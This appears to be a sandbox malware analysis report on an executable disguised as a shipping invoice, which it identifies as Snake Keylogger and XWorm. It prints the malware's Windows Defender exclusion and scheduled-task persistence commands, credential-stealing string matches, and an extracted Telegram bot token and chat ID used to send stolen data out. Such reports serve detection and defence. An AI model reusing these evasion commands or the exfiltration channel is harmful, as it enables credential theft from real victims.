Edit tour

Windows Analysis Report
SCS AWB and Commercial Invoice.exe

Overview

General Information

Sample name:	SCS AWB and Commercial Invoice.exe
Analysis ID:	1606536
MD5:	90d3693237ab538a39b44e399e96b668
SHA1:	d8a59dc7a9d4d8c6f4f0c9a86219746b00a3bbd7
SHA256:	777f42b7f48939008d57d46ff443a292669fbfdbba5c566090448b49fd5a79a3
Tags:	AsyncRATexeuser-threatcat_ch
Infos:

Detection

Snake Keylogger, XWorm

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

Adds a directory exclusion to Windows Defender

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies the context of a thread in another process (thread injection)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious Script Execution From Temp Folder

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara signature match

Classification

Process Tree

System is w10x64

SCS AWB and Commercial Invoice.exe (PID: 384 cmdline: "C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe" MD5: 90D3693237AB538A39B44E399E96B668)

powershell.exe (PID: 4416 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6528 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HOYVjVj.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6524 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HOYVjVj" /XML "C:\Users\user\AppData\Local\Temp\tmp5EFD.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 4592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SCS AWB and Commercial Invoice.exe (PID: 7340 cmdline: "C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe" MD5: 90D3693237AB538A39B44E399E96B668)

bxhciy.exe (PID: 7844 cmdline: "C:\Users\user\AppData\Local\Temp\bxhciy.exe" MD5: 95778B5E445F34C619D287B89DDED497)

powershell.exe (PID: 7976 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\bxhciy.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8028 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 8044 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ungagCKiEnZdl" /XML "C:\Users\user\AppData\Local\Temp\tmp85CF.tmp" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

bxhciy.exe (PID: 7200 cmdline: C:\Users\user\AppData\Local\Temp\bxhciy.exe MD5: 95778B5E445F34C619D287B89DDED497)

bdeukn.exe (PID: 7852 cmdline: "C:\Users\user\AppData\Local\Temp\bdeukn.exe" MD5: 2C7947DEAF97810D71CC5AD07871FF30)

HOYVjVj.exe (PID: 7420 cmdline: C:\Users\user\AppData\Roaming\HOYVjVj.exe MD5: 90D3693237AB538A39B44E399E96B668)

schtasks.exe (PID: 7632 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HOYVjVj" /XML "C:\Users\user\AppData\Local\Temp\tmp7237.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

HOYVjVj.exe (PID: 7680 cmdline: "C:\Users\user\AppData\Roaming\HOYVjVj.exe" MD5: 90D3693237AB538A39B44E399E96B668)

ungagCKiEnZdl.exe (PID: 4416 cmdline: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe MD5: 95778B5E445F34C619D287B89DDED497)

schtasks.exe (PID: 1124 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ungagCKiEnZdl" /XML "C:\Users\user\AppData\Local\Temp\tmp9F42.tmp" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 3920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ungagCKiEnZdl.exe (PID: 7644 cmdline: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe MD5: 95778B5E445F34C619D287B89DDED497)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7522567592:AAENXg2LZszJpvr2SAe_G2z5u_54oYaW6pI/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7522567592:AAENXg2LZszJpvr2SAe_G2z5u_54oYaW6pI/sendMessage?chat_id=6009622255", "Token": "7522567592:AAENXg2LZszJpvr2SAe_G2z5u_54oYaW6pI", "Chat_id": "6009622255", "Version": "5.1"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\bdeukn.exe	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
C:\Users\user\AppData\Local\Temp\bdeukn.exe	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x145c7:$a1: get_encryptedPassword 0x14a65:$a2: get_encryptedUsername 0x14327:$a3: get_timePasswordChanged 0x14433:$a4: get_passwordField 0x145dd:$a5: set_encryptedPassword 0x163cd:$a6: get_passwords 0x16727:$a7: get_logins 0x163b9:$a8: GetOutlookPasswords 0x15fe6:$a9: StartKeylogger 0x16680:$a10: KeyLoggerEventArgs 0x1605e:$a11: KeyLoggerEventArgsEventHandler 0x145b7:$a12: GetDataPassword
C:\Users\user\AppData\Local\Temp\bdeukn.exe	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1b4fa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a72c:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ab5f:$a4: \Orbitum\User Data\Default\Login Data 0x1bb9e:$a5: \Kometa\User Data\Default\Login Data
C:\Users\user\AppData\Local\Temp\bdeukn.exe	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x154d9:$s1: UnHook 0x154e0:$s2: SetHook 0x154e8:$s3: CallNextHook 0x154f5:$s4: _hook
C:\Users\user\AppData\Local\Temp\bdeukn.exe	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x15d33:$s8: GrabbedClp 0x15fe6:$s9: StartKeylogger 0x18b16:$x1: $%SMTPDV$ 0x173a8:$x2: $#TheHashHere%& 0x18abe:$x3: %FTPDV$ 0x17348:$x4: $%TelegramDv$ 0x1605e:$x5: KeyLoggerEventArgs 0x16680:$x5: KeyLoggerEventArgs 0x18ae2:$m2: Clipboard Logs ID 0x18d16:$m2: Screenshot Logs ID 0x18e26:$m2: keystroke Logs ID 0x19100:$m3: SnakePW 0x18cee:$m4: \SnakeKeylogger\

Memory Dumps

Source	Rule	Description	Author	Strings
00000010.00000002.4510487041.0000000003A8D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000E.00000002.2103901162.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000E.00000002.2103901162.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6c9b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d38:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e4d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6b0d:$cnc4: POST / HTTP/1.1
00000010.00000002.4510487041.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000001C.00000002.4510340081.000000000353D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000017.00000002.4511169630.0000000003716000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000017.00000002.4511169630.00000000037CC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000010.00000000.2162076092.0000000000442000.00000002.00000001.01000000.0000000E.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000010.00000000.2162076092.0000000000442000.00000002.00000001.01000000.0000000E.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x143c7:$a1: get_encryptedPassword 0x14865:$a2: get_encryptedUsername 0x14127:$a3: get_timePasswordChanged 0x14233:$a4: get_passwordField 0x143dd:$a5: set_encryptedPassword 0x161cd:$a6: get_passwords 0x16527:$a7: get_logins 0x161b9:$a8: GetOutlookPasswords 0x15de6:$a9: StartKeylogger 0x16480:$a10: KeyLoggerEventArgs 0x15e5e:$a11: KeyLoggerEventArgsEventHandler 0x143b7:$a12: GetDataPassword
00000010.00000000.2162076092.0000000000442000.00000002.00000001.01000000.0000000E.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x15b33:$s8: GrabbedClp 0x15de6:$s9: StartKeylogger 0x18916:$x1: $%SMTPDV$ 0x171a8:$x2: $#TheHashHere%& 0x188be:$x3: %FTPDV$ 0x17148:$x4: $%TelegramDv$ 0x15e5e:$x5: KeyLoggerEventArgs 0x16480:$x5: KeyLoggerEventArgs 0x188e2:$m2: Clipboard Logs ID 0x18b16:$m2: Screenshot Logs ID 0x18c26:$m2: keystroke Logs ID 0x18f00:$m3: SnakePW 0x18aee:$m4: \SnakeKeylogger\
00000017.00000002.4538875591.0000000140019000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000017.00000002.4511169630.00000000034C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000001C.00000002.4510340081.0000000003414000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000009.00000002.4514232504.0000000003131000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000A.00000002.2124704739.00000000034D3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000A.00000002.2124704739.00000000034D3000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6235f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6a83f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x732bf:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x623fc:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6a8dc:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7335c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x62511:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6a9f1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x73471:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x621d1:$cnc4: POST / HTTP/1.1 0x6a6b1:$cnc4: POST / HTTP/1.1 0x73131:$cnc4: POST / HTTP/1.1
00000000.00000002.2088900263.0000000002F63000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.2088900263.0000000002F63000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x64d97:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d283:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x75d43:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x64e34:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6d320:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x75de0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x64f49:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6d435:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x75ef5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x64c09:$cnc4: POST / HTTP/1.1 0x6d0f5:$cnc4: POST / HTTP/1.1 0x75bb5:$cnc4: POST / HTTP/1.1
0000001C.00000002.4510340081.00000000034CA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000017.00000002.4511169630.000000000383F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000019.00000002.2265748845.0000000016F04000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000019.00000002.2265748845.0000000016F04000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14c47:$a1: get_encryptedPassword 0x34287:$a1: get_encryptedPassword 0x536bf:$a1: get_encryptedPassword 0x150e5:$a2: get_encryptedUsername 0x34725:$a2: get_encryptedUsername 0x53b5d:$a2: get_encryptedUsername 0x149a7:$a3: get_timePasswordChanged 0x33fe7:$a3: get_timePasswordChanged 0x5341f:$a3: get_timePasswordChanged 0x14ab3:$a4: get_passwordField 0x340f3:$a4: get_passwordField 0x5352b:$a4: get_passwordField 0x14c5d:$a5: set_encryptedPassword 0x3429d:$a5: set_encryptedPassword 0x536d5:$a5: set_encryptedPassword 0x16a4d:$a6: get_passwords 0x3608d:$a6: get_passwords 0x554c5:$a6: get_passwords 0x16da7:$a7: get_logins 0x363e7:$a7: get_logins 0x5581f:$a7: get_logins
00000019.00000002.2265748845.0000000016F04000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x163b3:$s8: GrabbedClp 0x359f3:$s8: GrabbedClp 0x54e2b:$s8: GrabbedClp 0x16666:$s9: StartKeylogger 0x35ca6:$s9: StartKeylogger 0x550de:$s9: StartKeylogger 0x19196:$x1: $%SMTPDV$ 0x387d6:$x1: $%SMTPDV$ 0x57c0e:$x1: $%SMTPDV$ 0x17a28:$x2: $#TheHashHere%& 0x37068:$x2: $#TheHashHere%& 0x564a0:$x2: $#TheHashHere%& 0x1913e:$x3: %FTPDV$ 0x3877e:$x3: %FTPDV$ 0x57bb6:$x3: %FTPDV$ 0x179c8:$x4: $%TelegramDv$ 0x37008:$x4: $%TelegramDv$ 0x56440:$x4: $%TelegramDv$ 0x166de:$x5: KeyLoggerEventArgs 0x16d00:$x5: KeyLoggerEventArgs 0x35d1e:$x5: KeyLoggerEventArgs
0000000F.00000002.2212820152.0000000017034000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000F.00000002.2212820152.0000000017034000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14ccf:$a1: get_encryptedPassword 0x3430f:$a1: get_encryptedPassword 0x53747:$a1: get_encryptedPassword 0x1516d:$a2: get_encryptedUsername 0x347ad:$a2: get_encryptedUsername 0x53be5:$a2: get_encryptedUsername 0x14a2f:$a3: get_timePasswordChanged 0x3406f:$a3: get_timePasswordChanged 0x534a7:$a3: get_timePasswordChanged 0x14b3b:$a4: get_passwordField 0x3417b:$a4: get_passwordField 0x535b3:$a4: get_passwordField 0x14ce5:$a5: set_encryptedPassword 0x34325:$a5: set_encryptedPassword 0x5375d:$a5: set_encryptedPassword 0x16ad5:$a6: get_passwords 0x36115:$a6: get_passwords 0x5554d:$a6: get_passwords 0x16e2f:$a7: get_logins 0x3646f:$a7: get_logins 0x558a7:$a7: get_logins
0000000F.00000002.2212820152.0000000017034000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1643b:$s8: GrabbedClp 0x35a7b:$s8: GrabbedClp 0x54eb3:$s8: GrabbedClp 0x166ee:$s9: StartKeylogger 0x35d2e:$s9: StartKeylogger 0x55166:$s9: StartKeylogger 0x1921e:$x1: $%SMTPDV$ 0x3885e:$x1: $%SMTPDV$ 0x57c96:$x1: $%SMTPDV$ 0x17ab0:$x2: $#TheHashHere%& 0x370f0:$x2: $#TheHashHere%& 0x56528:$x2: $#TheHashHere%& 0x191c6:$x3: %FTPDV$ 0x38806:$x3: %FTPDV$ 0x57c3e:$x3: %FTPDV$ 0x17a50:$x4: $%TelegramDv$ 0x37090:$x4: $%TelegramDv$ 0x564c8:$x4: $%TelegramDv$ 0x16766:$x5: KeyLoggerEventArgs 0x16d88:$x5: KeyLoggerEventArgs 0x35da6:$x5: KeyLoggerEventArgs
00000010.00000002.4510487041.0000000003963000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000010.00000002.4510487041.0000000003711000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000001C.00000002.4510340081.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: SCS AWB and Commercial Invoice.exe PID: 384	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: SCS AWB and Commercial Invoice.exe PID: 384	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: SCS AWB and Commercial Invoice.exe PID: 7340	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: HOYVjVj.exe PID: 7420	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: HOYVjVj.exe PID: 7420	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: HOYVjVj.exe PID: 7680	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: bxhciy.exe PID: 7844	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: bxhciy.exe PID: 7844	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x61917:$a1: get_encryptedPassword 0x61dab:$a2: get_encryptedUsername 0x6168b:$a3: get_timePasswordChanged 0x61797:$a4: get_passwordField 0x6192d:$a5: set_encryptedPassword 0x636bf:$a6: get_passwords 0x63a19:$a7: get_logins 0x636ab:$a8: GetOutlookPasswords 0x632d8:$a9: StartKeylogger 0x63972:$a10: KeyLoggerEventArgs 0x63350:$a11: KeyLoggerEventArgsEventHandler 0x61907:$a12: GetDataPassword
Process Memory Space: bxhciy.exe PID: 7844	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x63025:$s8: GrabbedClp 0x632d8:$s9: StartKeylogger 0x63350:$x5: KeyLoggerEventArgs 0x63972:$x5: KeyLoggerEventArgs 0x6682f:$x5: KeyLoggerEventArgs 0x66def:$x5: KeyLoggerEventArgs 0x6d7f3:$x5: KeyLoggerEventArgs 0x6ddb3:$x5: KeyLoggerEventArgs 0x713c4:$x5: KeyLoggerEventArgs 0x71984:$x5: KeyLoggerEventArgs 0x684fc:$m2: Clipboard Logs ID 0x685fd:$m2: Screenshot Logs ID 0x68653:$m2: keystroke Logs ID 0x68788:$m3: SnakePW 0x685e9:$m4: \SnakeKeylogger\
Process Memory Space: bdeukn.exe PID: 7852	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: bdeukn.exe PID: 7852	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: bdeukn.exe PID: 7852	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x153b2:$a1: get_encryptedPassword 0x15846:$a2: get_encryptedUsername 0x15126:$a3: get_timePasswordChanged 0x15232:$a4: get_passwordField 0x153c8:$a5: set_encryptedPassword 0x1715a:$a6: get_passwords 0x174b4:$a7: get_logins 0x17146:$a8: GetOutlookPasswords 0x16d73:$a9: StartKeylogger 0x1740d:$a10: KeyLoggerEventArgs 0x16deb:$a11: KeyLoggerEventArgsEventHandler 0x153a2:$a12: GetDataPassword
Process Memory Space: bdeukn.exe PID: 7852	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x16ac0:$s8: GrabbedClp 0x16d73:$s9: StartKeylogger 0x16deb:$x5: KeyLoggerEventArgs 0x1740d:$x5: KeyLoggerEventArgs 0x1a2ca:$x5: KeyLoggerEventArgs 0x1a88a:$x5: KeyLoggerEventArgs 0x1bf97:$m2: Clipboard Logs ID 0x1c098:$m2: Screenshot Logs ID 0x1c0ee:$m2: keystroke Logs ID 0x1218:$m3: SnakePW 0x157f:$m3: SnakePW 0x17da:$m3: SnakePW 0x4ea7:$m3: SnakePW 0x13eac:$m3: SnakePW 0x1c223:$m3: SnakePW 0x63632:$m3: SnakePW 0x6383c:$m3: SnakePW 0x63a48:$m3: SnakePW 0x1c084:$m4: \SnakeKeylogger\
Process Memory Space: bxhciy.exe PID: 7200	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: bxhciy.exe PID: 7200	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: ungagCKiEnZdl.exe PID: 4416	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: ungagCKiEnZdl.exe PID: 4416	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x334ee:$a1: get_encryptedPassword 0x33982:$a2: get_encryptedUsername 0x33262:$a3: get_timePasswordChanged 0x3336e:$a4: get_passwordField 0x33504:$a5: set_encryptedPassword 0x35296:$a6: get_passwords 0x355f0:$a7: get_logins 0x35282:$a8: GetOutlookPasswords 0x34eaf:$a9: StartKeylogger 0x35549:$a10: KeyLoggerEventArgs 0x34f27:$a11: KeyLoggerEventArgsEventHandler 0x334de:$a12: GetDataPassword
Process Memory Space: ungagCKiEnZdl.exe PID: 4416	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x34bfc:$s8: GrabbedClp 0x34eaf:$s9: StartKeylogger 0x34f27:$x5: KeyLoggerEventArgs 0x35549:$x5: KeyLoggerEventArgs 0x38406:$x5: KeyLoggerEventArgs 0x389c6:$x5: KeyLoggerEventArgs 0x3f3ca:$x5: KeyLoggerEventArgs 0x3f98a:$x5: KeyLoggerEventArgs 0x42f9b:$x5: KeyLoggerEventArgs 0x4355b:$x5: KeyLoggerEventArgs 0x3a0d3:$m2: Clipboard Logs ID 0x3a1d4:$m2: Screenshot Logs ID 0x3a22a:$m2: keystroke Logs ID 0x3a35f:$m3: SnakePW 0x3a1c0:$m4: \SnakeKeylogger\
